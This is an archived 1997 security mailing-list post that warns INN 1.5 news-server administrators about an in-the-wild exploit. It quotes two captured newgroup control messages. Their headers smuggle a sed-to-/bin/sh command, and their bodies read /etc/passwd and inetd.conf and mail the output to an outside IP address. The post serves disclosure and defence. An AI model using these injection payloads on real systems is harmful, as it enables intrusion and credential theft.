[80] in Best-of-Security

home help back first fref pref prev next nref lref last post

BoS: INND exploited...

daemon@ATHENA.MIT.EDU (Joseph J. Snyder III)
Sun Mar 16 04:41:52 1997

From: "Joseph J. Snyder III" <jsnyder@plasma.ea.wsoc.com>
Date: Sun, 16 Mar 97 0:13:03 EST
Reply-To: best-of-security@suburbia.net
Errors-To: best-of-security-request@suburbia.net
To: best-of-security@suburbia.net
Resent-From: best-of-security@suburbia.net


        Just dropping a quick line for those of you who did not take
        the advise of CERT 97:08-innd advisory.  If you are using 
        innd 1.5 or lower then you probably got hacked last night starting
        around 4:45 EST.  The attack made use of the exploit to 
        gain information (/etc/passwd/, os version, routes, inetd.conf) 
        This attack also started telnet connections from the news server to
        a remote host.  At this time I do not have any futher information.
        The following is a sample of how the exploit.   


        Unparseable newgroup by tale@uunet.uu.net
         Path: nntp.xxxxxxxxx.xxx!nntp.netrex.net!gatech!EU.net!Norway.EU.net!sn.no!online.no!news.omgroup.com!online.no!bounce-back
         From: tale@uunet.uu.net (David C Lawrence)
         Newsgroups: comp.sys.mac.printing
         Subject: cmsg newgroup `/bin/sed:-n:'/^#+/,/^#-/p':${ARTICLE}|/bin/sh` moderatedControl: newgroup `/bin/sed:-n:'/^#+/,/^#-/p':${ARTICLE}|/bin/sh` moderated
         Approved: newgroups-request@uunet.uu.net
         Message-ID: <830201540.9220@uunet.uu.net>
         Date: Sat, 15 Mar 1997 15:15:15 GMT
         Lines: 4
             
         #+
         (/bin/uname -a; /bin/who; /bin/cat /etc/passwd; /bin/cat /etc/inetd.conf) | /bi>#-
              

        Unsafe newgroup by tale@uunet.uu.net
        Path: nntp.xxxxxxxxx.xxx!nntp.netrex.net!sbcntrex!news.eecs.umich.edu!news.radio.cz!newsbastard.radio.cz!news.radio.cz!CESspool!news.maxwell.syr.edu!nntp.uio.no!Norway.EU.net!online.no!news.omgroup.com!online.no!bounce-back
        From: tale@uunet.uu.net (David C Lawrence)
        Newsgroups: comp.sys.mac.printing
        Subject: cmsg newgroup `/bin/sed:-n:'/^#+/,/^#-/p':${ARTICLE}|/bin/sh` moderated
        Control: newgroup `/bin/sed:-n:'/^#+/,/^#-/p':${ARTICLE}|/bin/sh` moderated
         Approved: newgroups-request@uunet.uu.net
         Message-ID: <830201540.9223@uunet.uu.net>
         Date: Sat, 15 Mar 1997 15:15:15 GMT
         Lines: 4

         #+
          (/bin/uname -a; /bin/who; /bin/cat /etc/passwd; /bin/cat /etc/inetd.conf) | /usr/ucb/Mail -s kalle root@[193.12.106.1]
         #-

        I'm sorry about the informalness of this post.
        If anyone else has more info. please contribute.


        joe.

        Joseph J. Snyder III
        Litton-PRC, Inc.
        Network Security Engineer
        http://c3i.wsoc.com/
        jsnyder@plasma.ea.wsoc.com
home help back first fref pref prev next nref lref last post